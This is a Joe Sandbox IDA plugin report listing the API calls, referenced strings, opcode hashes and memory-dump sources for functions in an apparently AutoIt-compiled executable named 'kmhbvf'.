                                                                  • Opcode ID: d65038279d7b2a9b8aef8861f0e026162d658a4608f65d050aecf55eadc362b4
                                                                  • Instruction ID: 8aa699af09c8c264f4a63ec8e59012441ccccd392ebebb9a70d3791f572f8fd1
                                                                  • Opcode Fuzzy Hash: d65038279d7b2a9b8aef8861f0e026162d658a4608f65d050aecf55eadc362b4
                                                                  • Instruction Fuzzy Hash: 17110C7240020CBFDB029F90DC48E9A7FADEB04354F148051FA195A160DBB1AE55EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EF07EC
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EF07F4
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EF07FF
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EF080A
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EF0812
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EF081A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: 35c33b274172612703e2fe6028654450af9c1c29703172a4dd1c5e004a3a5309
                                                                  • Instruction ID: 6f6d81ff36b7f7872d6528ae3be76866c9509e20cbf05c867af738020ae9df01
                                                                  • Opcode Fuzzy Hash: 35c33b274172612703e2fe6028654450af9c1c29703172a4dd1c5e004a3a5309
                                                                  • Instruction Fuzzy Hash: 090148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847941C7F5A864CBE5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F359B4
                                                                  • SendMessageTimeoutW.USER32 ref: 00F359CA
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00F359D9
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F359E8
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F359F2
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F359F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: 247c7ca3805fe968af9ce586b017c3f109b62a1d393959198442a2091d49b080
                                                                  • Instruction ID: eb632b2ae8c855c6594ac2328adbab707e1152157f216d4cd2533df9609c67db
                                                                  • Opcode Fuzzy Hash: 247c7ca3805fe968af9ce586b017c3f109b62a1d393959198442a2091d49b080
                                                                  • Instruction Fuzzy Hash: A3F03A3264115CBBE7215B92DC0EEEF7B7CEFCBB22F100159FA1591050EBE11A11A6B5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00F377FE
                                                                  • EnterCriticalSection.KERNEL32(?,?,00EDC2B6,?,?), ref: 00F3780F
                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00EDC2B6,?,?), ref: 00F3781C
                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EDC2B6,?,?), ref: 00F37829
                                                                    • Part of subcall function 00F371F0: CloseHandle.KERNEL32(00000000,?,00F37836,?,00EDC2B6,?,?), ref: 00F371FA
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F3783C
                                                                  • LeaveCriticalSection.KERNEL32(?,?,00EDC2B6,?,?), ref: 00F37843
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: 4c2bc7cabb500d0c127a2f56fb321da1e61dd3c4b6de9c129907b6aa9872a2fb
                                                                  • Instruction ID: cda87eefc999729408030c09405ff07d59744f18f87a0358950be1d1ea28cd4c
                                                                  • Opcode Fuzzy Hash: 4c2bc7cabb500d0c127a2f56fb321da1e61dd3c4b6de9c129907b6aa9872a2fb
                                                                  • Instruction Fuzzy Hash: 76F05E72555216ABD7212B64EC8DAEB7729FF45712F240821F102950A0CFF55801FB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F29555
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00F29561
                                                                  • CloseHandle.KERNEL32(?), ref: 00F2956A
                                                                  • CloseHandle.KERNEL32(?), ref: 00F29572
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00F2957B
                                                                  • HeapFree.KERNEL32(00000000), ref: 00F29582
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: e2d21c1467467fe3f8b90f9154994381df354c3b0bd5f598922fefbc60ee7c74
                                                                  • Instruction ID: 1d8cfff46190199c4fdc5bd13f62343e7a40552918f130a4ce3d8fc6a734555e
                                                                  • Opcode Fuzzy Hash: e2d21c1467467fe3f8b90f9154994381df354c3b0bd5f598922fefbc60ee7c74
                                                                  • Instruction Fuzzy Hash: 89E0E536004109BBDB021FE1EC0C95BBF39FF4A722B204620F22581170CFB2A460FB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00F48CFD
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F48E0C
                                                                  • VariantClear.OLEAUT32(?), ref: 00F48F84
                                                                    • Part of subcall function 00F37B1D: VariantInit.OLEAUT32(00000000), ref: 00F37B5D
                                                                    • Part of subcall function 00F37B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00F37B66
                                                                    • Part of subcall function 00F37B1D: VariantClear.OLEAUT32(00000000), ref: 00F37B72
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: 249f0de96dcaaa5a3bddb870f5400229956f87f513c6241a7b764177616d9b87
                                                                  • Instruction ID: 72fc06fb3ba82b19fad662716383bdc1bdd59c285c27d25ccc0433ca1f0849ca
                                                                  • Opcode Fuzzy Hash: 249f0de96dcaaa5a3bddb870f5400229956f87f513c6241a7b764177616d9b87
                                                                  • Instruction Fuzzy Hash: 66919D71A083019FC710DF24C48095EBBF5EF99354F14896EF89A9B3A2DB30E946DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D
                                                                  • _memset.LIBCMT ref: 00F3332E
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F3335D
                                                                  • SetMenuItemInfoW.USER32 ref: 00F33410
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F3343E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: d213abdb83d0edf4a7049094a8f646cd32199305c3f28f3fa3befc0a2541f93a
                                                                  • Instruction ID: 965333c013d09572fa26f7eaf9a297a6f3685d1b3224659a3e0b762d8ae2ad51
                                                                  • Opcode Fuzzy Hash: d213abdb83d0edf4a7049094a8f646cd32199305c3f28f3fa3befc0a2541f93a
                                                                  • Instruction Fuzzy Hash: 9851D031A083059BD716EF28C84566BB7E8AF45730F044A2DF895E31E1DB70DE44EB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE4A8C: _fseek.LIBCMT ref: 00EE4AA4
                                                                    • Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DE1
                                                                    • Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DF4
                                                                  • _free.LIBCMT ref: 00F39C5F
                                                                  • _free.LIBCMT ref: 00F39C66
                                                                  • _free.LIBCMT ref: 00F39CD1
                                                                    • Part of subcall function 00EF2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00EF9C54,00000000,00EF8D5D,00EF59C3), ref: 00EF2F99
                                                                    • Part of subcall function 00EF2F85: GetLastError.KERNEL32(00000000,?,00EF9C54,00000000,00EF8D5D,00EF59C3), ref: 00EF2FAB
                                                                  • _free.LIBCMT ref: 00F39CD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                  • API String ID: 1552873950-2806939583
                                                                  • Opcode ID: f22fbf785f24ff7080a06b429302cc1975fd514017628d7500fa8fc2f6ed517e
                                                                  • Instruction ID: ec3dfdff22759c2383a6ad52b3e75f2eb90cd89b8aad5f36a05dd0f92bd73aec
                                                                  • Opcode Fuzzy Hash: f22fbf785f24ff7080a06b429302cc1975fd514017628d7500fa8fc2f6ed517e
                                                                  • Instruction Fuzzy Hash: 22513EB1D04259AFDF149F65DC45AAEBBB9FF48314F0000AEB259B3241D7715A808F58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F32F67
                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F32F83
                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00F32FC9
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F97890,00000000), ref: 00F33012
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: acf52e22f69d2c1b5be8488761e539567cabc4a8a8005e20d10c4c4bac791334
                                                                  • Instruction ID: 7decb470cf3b837d13a474d58dd7f0614f174838e3c2b0d385401716d9f6e854
                                                                  • Opcode Fuzzy Hash: acf52e22f69d2c1b5be8488761e539567cabc4a8a8005e20d10c4c4bac791334
                                                                  • Instruction Fuzzy Hash: AA41D571604341AFD724DF24CC84B1ABBE4AF84334F14461EF5A5972D1DB70EA05DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4DEAE
                                                                    • Part of subcall function 00EE1462: _memmove.LIBCMT ref: 00EE14B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower_memmove
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 3425801089-567219261
                                                                  • Opcode ID: ddd630d9bf69c1bcbf2ce9796d0c9f78d6ce0d44dd868eb1943b048f2ab3205a
                                                                  • Instruction ID: 72c4dfbe54cca7dd0771483f435a617a9bd90ff05e8d64a10fc30e2fcedcbf80
                                                                  • Opcode Fuzzy Hash: ddd630d9bf69c1bcbf2ce9796d0c9f78d6ce0d44dd868eb1943b048f2ab3205a
                                                                  • Instruction Fuzzy Hash: D831B270900219AFDF24EF54CC409EEB7B4FF14324B108A69F876A76D2DB31A949DB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F29ACC
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F29ADF
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F29B0F
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 365058703-1403004172
                                                                  • Opcode ID: f10d213509cce874e01da9d02fbbc1e74efc25b315314efa387c505e7505c261
                                                                  • Instruction ID: 510efc62e1b50d1d18682d43cd2dbb29830234a6c1e7b59a50c2e794dba60e9a
                                                                  • Opcode Fuzzy Hash: f10d213509cce874e01da9d02fbbc1e74efc25b315314efa387c505e7505c261
                                                                  • Instruction Fuzzy Hash: 51210772D05108BEDB14EBA0EC45DFFB7B8DF85360F204119F825A72E1DB794945A620
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F41F18
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F41F3E
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F41F6E
                                                                  • InternetCloseHandle.WININET(00000000), ref: 00F41FB5
                                                                    • Part of subcall function 00F42B4F: GetLastError.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B64
                                                                    • Part of subcall function 00F42B4F: SetEvent.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B79
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 3113390036-3916222277
                                                                  • Opcode ID: 2be503e33368c5a58c9c234be90c3629c9cbacb282d51d1b5cbe4a9c76881ca2
                                                                  • Instruction ID: 64d99a6dca5bf3e82713a34a8b822ff40e38380d55ace80b287344ccc8251ae7
                                                                  • Opcode Fuzzy Hash: 2be503e33368c5a58c9c234be90c3629c9cbacb282d51d1b5cbe4a9c76881ca2
                                                                  • Instruction Fuzzy Hash: 2F21A4B1A0420CBFE7119F64CC85FBF7BEDFB487A4F10412AF90596240DB649D496BA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED2111: CreateWindowExW.USER32 ref: 00ED214F
                                                                    • Part of subcall function 00ED2111: GetStockObject.GDI32(00000011), ref: 00ED2163
                                                                    • Part of subcall function 00ED2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F56A86
                                                                  • LoadLibraryW.KERNEL32(?), ref: 00F56A8D
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F56AA2
                                                                  • DestroyWindow.USER32(?), ref: 00F56AAA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  • Opcode ID: 355afac230653a7c19e0e2d784872fc49d69eb73d4c8bbab50017f1397cfac0e
                                                                  • Instruction ID: 5d2fc9c2370b3fd7f0c9cf23f5578b17a889cfc1ba70299b6af267be536a5410
                                                                  • Opcode Fuzzy Hash: 355afac230653a7c19e0e2d784872fc49d69eb73d4c8bbab50017f1397cfac0e
                                                                  • Instruction Fuzzy Hash: 8C21AC71600209ABEF108E64DC80EBB37A8EB59335F908619FF20E31A1D7798C55B760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00F37377
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F373AA
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00F373BC
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F373F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 8202cf145d7f2cb341276806377297aec2ceffd665ed7d23c94a1c93806a1d55
                                                                  • Instruction ID: bc5e7965f8df3f3df15c6cdec1d5ed166d0fdfe3afed0d728e3020dc5b702c29
                                                                  • Opcode Fuzzy Hash: 8202cf145d7f2cb341276806377297aec2ceffd665ed7d23c94a1c93806a1d55
                                                                  • Instruction Fuzzy Hash: 112177B190830AABDB30AF65DC45A9AB7E4AF45730F204A19FCA1D72D0D7B1D854FB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00F37444
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F37476
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00F37487
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F374C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 02b1c48443d9abf12ff0c6aff2c5d57735d225631dc8a5fd396998da82911e39
                                                                  • Instruction ID: 75459ae4cb5803d86b1783c623325d1b6b58c7a95c767ce0e63d4726d001de26
                                                                  • Opcode Fuzzy Hash: 02b1c48443d9abf12ff0c6aff2c5d57735d225631dc8a5fd396998da82911e39
                                                                  • Instruction Fuzzy Hash: D22181B1908309DBDB30EF68DC45A9A7BA8AF55730F200A19F9A0D72D0DB70E850EB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00F3B297
